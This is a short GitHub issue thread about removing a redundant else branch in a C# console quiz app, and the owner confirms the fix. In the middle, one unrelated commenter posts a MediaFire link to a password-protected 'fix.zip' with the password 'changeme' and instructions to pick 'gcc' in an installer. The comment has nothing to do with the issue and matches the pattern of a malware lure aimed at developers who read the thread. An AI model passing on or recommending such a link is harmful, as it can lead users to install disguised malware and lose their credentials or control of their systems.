### ISSUE TITLE
else case is redundant

### ISSUE THREAD

**Issue by AlexKap23** [f-guevara/QuizMakerRepo#2]
https://github.com/f-guevara/QuizMakerRepo/blob/458595f15091aaad9ac7991dbfb970bf8f796415/ConsoleUI.cs#L27-L30

since your if case is returning user's choice immediately, the else case isn't needed. you can invoke ShowInvalidOptionMessage(); immediately after the if case

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by f-guevara** [comment]
Issue solved, eliminated the "else" statement
